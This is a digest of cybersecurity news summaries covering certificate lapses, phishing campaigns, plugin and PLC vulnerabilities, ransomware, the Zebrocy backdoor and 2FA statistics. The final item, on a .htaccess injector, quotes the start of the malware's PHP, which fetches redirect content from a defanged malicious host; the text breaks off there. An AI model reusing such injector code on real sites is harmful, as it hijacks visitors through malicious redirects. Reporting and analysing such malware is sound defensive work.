• LinkedIn again late at renewing TLS certificate
    LinkedIn was again late at renewing its TLS certificate. The shortened URL lnkd.in was found with its TLS certificate lapsed. This is the second time LinkedIn forgot to renew the certificate on time, putting user data at risk.
  • New spam campaign uses fake legal threats to lure victims
    New spam campaign uses fake legal threats to lure victims. The spam emails, purporting to come from a law firm, tell victims that they are being sued. A phishing kit reported to be a part of the campaign showed that the targets were primarily Canadian businesses.
  • Slimstat WordPress plugin found to be affected by XSS vulnerability
    Slimstat WordPress plugin found to be affected by XSS vulnerability. The vulnerability can allow an attacker to inject arbitrary JavaScript code on the plugin access log. Versions prior to 4.8.1 of the Slimstat plugin are affected by the XSS vulnerability.
  • Free decryptor released for GetCrypt ransomware that spreads through RIG exploit kit
    Free decryptor released for GetCrypt ransomware that spreads through RIG exploit kit. GetCrypt uses a combo of Salsa20 and RSA-4096 algorithms to encrypt the victim’s files. While encrypting, it appends a random 4 character extension to the infected files.
  • Denial of Service (DoS) vulnerability found in Mitsubishi PLCs
    Denial of Service (DoS) vulnerability found in Mitsubishi PLCs. The vulnerability has impacted Mitsubishi Electric MELSEC-Q series PLCs, specifically QJ71E71-100 Ethernet interface module version 20121 and prior. Mitsubishi Electric has patched the vulnerability in the latest version v20122.
  • Zebrocy targets Yandex Browser, Chromium and versions of Microsoft Outlook
    Zebrocy backdoor targets Yandex Browser, Chromium and versions of Microsoft Outlook. The first set of commands collects information about the victim’s system and environment. The attackers behind Zebrocy drop dumpers on victims’ computers in order to collect login credentials and private keys from web browsers including Yandex Browser, Chromium, 7Star Browser, CentBrowser, and versions of Microsoft Outlook from 1997 through 2016.
  • Two zero-days impacting Microsoft products published on GitHub
    Two zero-days impacting Microsoft products published on GitHub. SandboxEscaper uncovered a zero-day vulnerability in the Windows Error Reporting service dubbed ‘AngryPolarBearBug2’. The researcher also published demo exploit code for a zero-day vulnerability impacting Internet Explorer 11.
  • Khan Academy patched two critical cross-site request forgery flaws
    Khan Academy patched two critical cross-site request forgery flaws. The first vulnerability could allow an attacker to take over accounts that were created using the Google or Facebook login option. The second vulnerability stemmed from the flaw in the endpoint that allows users to change their email before they confirm their account email.
  • America's Oldest Professional Theatre Company "The Shubert Organization" Suffers Data Breach
    “We take security of personal information in our care very seriously,” stressed a representative of the Shubert Organization, which owns 17 Broadway theaters and the popular ticketing service Telecharge. “We have security measures in place to protect the data on our systems, and we continue to assess and update our security measures and training to our employees to safeguard the privacy and security of information in our care,” the representative continued. As more and more information is stored on the Internet, cyber-security breaches are quite common for large businesses. In 2016, about 34 percent of American companies suffered a breach, and 86 percent of chief information security officers now believe that breaches are inevitable. “Data breaches are now a consistent ‘cost of doing business’ in the cybercrime era,” commented Larry Ponemon, the founder of a data security research firm. “It’s important to ensure that security measures are up to date across the entire network of companies,” stressed Guy Bunker, the senior vice president of products at Clearswift, an information security company.
  • Equifax Is Finally Getting Kicked in the Money Bags Due to Its Disastrous 2017 Hack
    This week, the financial rating service Moody’s downgraded Equifax from a “stable” to a “negative” outlook due to the high level of cybersecurity spending and litigation that comes as a direct result of the 2017 breach.
  • EPA Cybersecurity Weaknesses Are Going Untracked and Unpatched
    The agency created an automated tool for logging vulnerabilities that will take time to remediate and track progress through official plans of action and milestones. Another office identified 10 high-risk weaknesses but never developed action plans for remediation. “This happened because the office responsible for identifying vulnerabilities relies on other agency offices to enter the [plans of action and milestones] in the tracking system to manage unremediated vulnerabilities,” auditors wrote. The system that houses the remediation plans does not have proper access controls, enabling unauthorized users to go in and make changes to the system’s audit logs, the IG found. “This occurred because the EPA neither enabled the feature within the tracking system to prevent unauthorized modifications to key data nor configured the system’s logging feature to capture information on the modification of key data fields,” the IG wrote.
  • Russian Nation-State Hacking Unit's Tools Get More Fancy
    Researchers from security firm ESET this week published new findings on the attack tool, which improves upon the older Sofacy backdoor, and combines downloaders and remote administration tools to allow attackers to control compromised systems. ESET used telemetry generated by systems using its security agent to observe the initial Zebrocy infection via spearphishing attacks and subsequent commands, the company stated in an analysis. "We were able to monitor the way they use the Zebrocy malware after they infected their target, including all the interactions they had with the infected systems, and gain some intelligence," says Alexis Dorais-Joncas, security intelligence team lead for ESET. In 2018, for example, ESET discovered that the Sednit group had successfully deployed a Unified Extensible Firmware Interface (UEFI) rootkit, dubbed LoJax, which infects the basic hardware operating system and can survive rebooting the system. Once installed, the operators would quickly perform reconnaissance on the system and gather operating system and file information, as well as other details about the system.
  • Google shut out Baltimore officials using Gmail after ransomware attack
    The Baltimore city government is recovering from a devastating ransomware attack that has locked up its systems, but officials in the city faced a new problem today. As first reported by The Baltimore Sun, Google blocked city departments from using Gmail accounts created as a workaround. According to the Sun, which cited the mayor’s office, Google’s systems deemed the city officials to be part of an organization, and shut down the temporary accounts. Emails to the city health department, city council aides, and the mayor’s office bounced on Thursday, according to the report from the Sun. “We have restored access to the Gmail accounts for the Baltimore city officials,” the spokesperson said. “Our automated security systems disabled the accounts due to the bulk creation of multiple consumer Gmail accounts from the same network.” Update, 5:43 PM ET: Includes statement from Google spokesperson.
  • LinkedIn Admits a Delay in Renewing TLS Cert
    LinkedIn users noticed on Tuesday that attempts to access the site from their desktop or laptop computer were met with an alert warning that the connection was not secure – the result of LinkedIn’s failure to renew the TLS certificate for its lnkd.in URL shortener, according to Computer Business Review (CBR). “We had a brief delay in our SSL certificate update yesterday, which was quickly fixed, and member data was not affected,” a LinkedIn spokesperson wrote in an email. If you are wondering why your browser is throwing a Certificate Error when navigating around @LinkedIn posts their cert expired a few hours ago on the URL shortener lnkd[.]in. Leonard and others noted that this is the second time that LinkedIn has allowed a certificate to expire. “Large organizations with hundreds of millions of users globally should be setting the standard for security practices and unfortunately this is the second time that LinkedIn failed to update their SSL certificate, effectively putting user data and privacy at risk,” Leonard reportedly told CBR.
  • Email scam warning for Ministry for Primary Industries customers
    The phishing email was sent to some customers and impersonated MPI. The subject line read "Re: Notices to All MPI Registerd (sic) Exporters" and asked customers to check an email attachment for corrections. MPI recommended those who had already clicked on the email or opened the attachment to change passwords for any login credentials entered. Email phishing guide:
    - Only open email attachments you are expecting or know the sender
    - Do not contact them on the phone numbers, websites or email addresses included in the email
  • Google data shows 2-factor authentication blocks 100% of automated bot hacks
    Getting flustered because you have to find your phone and tap on a prompt every time you log into your accounts from a new device is peak first-world problems. If you’re not familiar with two-factor authentication (2FA) or two-step verification, it’s all about using an extra layer of security to prove the person logging into an account or device is really you. Google supports these forms of 2FA and others; if you have it enabled on your Android device, you’ve probably come across the “Trying to sign in?” prompt. Receiving a secondary SMS code blocked 100 percent of automated attacks, 96 percent of bulk phishing attacks, and 76 percent of direct, targeted attacks – like those made by hired hackers. Of course, using a physical security key is safest, blocking 100 percent of each kind of attack during Google’s investigation. For most people, simply adding a recovery phone number to your Google account can make it much easier to keep your account safe when Google detects suspicious activity.
  • USAF investigating USN for planting email tracking malware
    In a convoluted plot even the most inventive TV writer would have a hard time conjuring, the U.S. Air Force is investigating an alleged cyber intrusion by the U.S. Navy. A U.S. Air Force lawyer and Navy Times journalist each received emails containing tracking malware that was allegedly sent by a U.S. Navy prosecutor in an attempt to track down who was leaking information to the press regarding the trial of a Navy SEAL, according to the Air Force Times. The Air Force Times cited a May 19 memo by Capt. David Wilson, chief of staff for the Navy’s Defense Service Offices, that said he discovered that tracking software was included in an email sent to an Air Force lawyer defending Navy SEAL Edward Gallagher, who, among others, has been charged with war crimes stemming from incidents in Iraq. The tracking malware was placed after a Navy judge issued a gag order for Gallagher’s case, but information continued to leak to the Navy Times, which is why Carl Pines, the publication’s editor, was also on the receiving end of the malware-laced emails, the Air Force Times reported.
  • .htaccess Injector on Joomla and WordPress Websites
    This code is responsible for injecting the malicious redirects into the .htaccess files: <?php echo'Wordpress ';$htac=file_get_contents('hXXp://recaptcha-in[.